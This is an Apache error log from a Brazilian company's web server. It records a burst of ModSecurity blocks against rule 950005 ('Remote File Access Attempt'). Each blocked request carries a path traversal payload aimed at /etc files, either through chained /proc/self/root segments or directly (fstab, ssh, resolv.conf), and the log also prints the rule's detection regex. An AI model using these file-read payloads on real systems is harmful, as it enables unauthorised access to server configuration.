[Thu Mar 19 14:36:35.447490 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:33110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw0IwkwaGbbGflqUZDlmAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:36:41.651456 2026] [:error] [pid 7545:tid 140411674785536] [client 74.7.243.128:40958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw0KX8B84UptSoTJtYrGwAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:37:05.125803 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40774] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:37:31.192957 2026] [:error] [pid 8307:tid 140411565680384] [client 74.7.243.128:40962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw0W7-FhjpZGs9ba8qG-wAAAxU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:37:37.122894 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:37:41.646616 2026] [:error] [pid 7545:tid 140411649607424] [client 74.7.243.128:53996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw0ZX8B84UptSoTJtYrPQAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:37:47.004149 2026] [:error] [pid 7235:tid 140411666392832] [client 57.141.18.48:45950] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0a_qxLDW4GITHUkSEyAAAAQk"]
[Thu Mar 19 14:37:47.396174 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.42:45962] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0axCii7xarUs8iHYFhwAAAg4"]
[Thu Mar 19 14:37:47.802632 2026] [:error] [pid 17653:tid 140411741927168] [client 57.141.18.104:45398] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0a8df6f5d65gmYZSWmwAAAsA"]
[Thu Mar 19 14:37:48.204276 2026] [:error] [pid 17887:tid 140411649607424] [client 57.141.18.25:45986] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bAkwaGbbGflqUZDlwgAAAMs"]
[Thu Mar 19 14:37:48.397145 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.120:45988] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bOoXxyEfFpUF8f8otwAAAUY"]
[Thu Mar 19 14:37:48.613007 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.17:45992] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bPqxLDW4GITHUkSEyQAAARE"]
[Thu Mar 19 14:37:49.195257 2026] [:error] [pid 8307:tid 140411616036608] [client 57.141.18.47:45682] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bb-FhjpZGs9ba8qG_gAAAw8"]
[Thu Mar 19 14:37:49.243928 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.62:45430] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bcdf6f5d65gmYZSWnAAAAtU"]
[Thu Mar 19 14:37:49.932665 2026] [:error] [pid 14269:tid 140411716749056] [client 57.141.18.84:45712] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bQbLMZ6AikZjR9V5mwAAAAM"]
[Thu Mar 19 14:37:50.140865 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.66:46028] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bvqxLDW4GITHUkSEywAAARA"]
[Thu Mar 19 14:37:50.414278 2026] [:error] [pid 14269:tid 140411548894976] [client 57.141.18.24:46036] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bgbLMZ6AikZjR9V5nAAAABc"]
[Thu Mar 19 14:37:50.678549 2026] [:error] [pid 17887:tid 140411666392832] [client 57.141.18.11:45734] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0bgkwaGbbGflqUZDlwwAAAMk"]
[Thu Mar 19 14:37:51.219031 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.97:46058] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0b-oXxyEfFpUF8f8ouQAAAVQ"]
[Thu Mar 19 14:37:51.456069 2026] [:error] [pid 7545:tid 140411607643904] [client 57.141.18.40:45784] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0b38B84UptSoTJtYrSQAAAZA"]
[Thu Mar 19 14:37:51.559682 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.74:46064] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0b_-YZRR_7pZ7nDKnigAAA8c"]
[Thu Mar 19 14:37:52.616366 2026] [:error] [pid 27293:tid 140411658000128] [client 57.141.18.75:46102] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cP-YZRR_7pZ7nDKniwAAA8o"]
[Thu Mar 19 14:37:52.762710 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.117:46110] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cOoXxyEfFpUF8f8ouwAAAVE"]
[Thu Mar 19 14:37:53.241788 2026] [:error] [pid 17653:tid 140411624429312] [client 57.141.18.18:45496] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ccdf6f5d65gmYZSWnQAAAs4"]
[Thu Mar 19 14:37:53.815796 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.74:46132] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cRCii7xarUs8iHYFjAAAAgU"]
[Thu Mar 19 14:37:53.990326 2026] [:error] [pid 27293:tid 140411557287680] [client 57.141.18.11:46140] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cf-YZRR_7pZ7nDKnjAAAA9Y"]
[Thu Mar 19 14:37:54.252088 2026] [:error] [pid 14269:tid 140411565680384] [client 57.141.18.35:45326] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cgbLMZ6AikZjR9V5ngAAABU"]
[Thu Mar 19 14:37:54.580094 2026] [:error] [pid 8307:tid 140411658000128] [client 57.141.18.0:46154] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cr-FhjpZGs9ba8qHAAAAAwo"]
[Thu Mar 19 14:37:54.807795 2026] [:error] [pid 7545:tid 140411632822016] [client 57.141.18.88:45844] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cn8B84UptSoTJtYrSwAAAY0"]
